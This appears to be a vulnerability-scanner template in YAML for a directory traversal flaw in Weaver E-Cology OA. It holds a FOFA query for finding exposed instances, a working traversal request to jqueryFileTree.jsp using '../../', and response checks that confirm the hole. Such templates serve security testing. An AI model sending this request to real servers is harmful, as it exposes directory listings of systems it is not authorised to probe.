product: 泛微 E-Cology
vName: 泛微E-Cology jqueryFileTree.jsp 目录遍历
type: 目录遍历
vID: [ ]
level: 3
vDesc: 泛微 E-Cology jqueryFileTree.jsp 目录遍历
version: ''
note: ''
search:
  FOFA: app="泛微-OA（e-cology）"
protocol: http
link: ''
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: get
      follow: false
      path: /hrm/hrm_e9/orgChart/js/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.jsp?dir=/page/resource/userfile/../../
    verify:
      path: ''
      logic: and
      check:
        - status: 200
          body:
            value:
              - index.jsp
              - PortalCenter.jsp
            logic: and